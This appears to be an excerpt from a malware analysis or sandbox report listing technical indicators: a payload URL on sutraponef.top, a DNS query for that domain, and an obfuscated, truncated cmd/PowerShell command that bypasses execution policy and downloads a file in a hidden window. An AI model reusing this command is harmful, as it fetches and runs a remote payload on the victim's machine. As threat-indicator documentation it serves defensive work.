Technical Information
- http://sutraponef.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^wERShE^ll.EXe^ -EX^eCu^TI^o^NPolic^y ^B^Y^pa^S^S^ ^-nOproFI^Le -^WiN^d^ow^styLe H^I^DD^E^n ^(^New-^oB^je^c^T^ ^sYsT^E^M.NEt.^Web^C^lIE^NT).DO^WNLOADf^il^E('http://sutrapone...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "Po^wERShE^ll.EXe^ -EX^eCu^TI^o^NPolic^y ^B^Y^pa^S^S^ ^-nOproFI^Le -^WiN^d^ow^styLe H^I^DD^E^n ^(^New-^oB^je^c^T^ ^sYsT^E^M.NEt.^Web^C^lIE^NT).DO^WNLOADf^il^E('http://sutrapone...' (with hidden window)